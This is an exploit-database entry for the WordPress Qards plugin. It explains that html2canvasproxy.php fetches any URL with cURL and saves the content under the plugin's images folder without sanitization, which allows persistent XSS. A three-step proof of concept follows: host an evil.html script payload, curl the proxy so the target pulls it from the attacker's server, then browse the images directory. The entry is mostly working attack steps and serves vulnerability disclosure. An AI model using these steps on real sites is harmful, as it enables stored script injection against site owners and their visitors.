## https://sploitus.com/exploit?id=WPEX-ID:AAF192D9-3C7F-4AA2-88CF-5DF26C7A8721
The vulnerable script http://target/wp-content/plugins/qards/html2canvasproxy.php
get the value of the "url" parameter and, using CURL PHP functions, saves the website's content to a file at /wp-content/plugins/qards/images/ with a filename formatted as following:
<hash md5>.<mime-type>
On a web server with "Directory Listing" enabled, you could easily find that file.
Due to improper sanitization, the generated file, suffer from a persistent XSS vulnerability.
POC:
1. create a remote file (evil.html), on your webserver, with the following content:
<script> alert('XSS'); </script>
2. curl 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://yourserver/evil.html'
3. Browse to http://target/wp-content/plugins/qards/images/ to get the file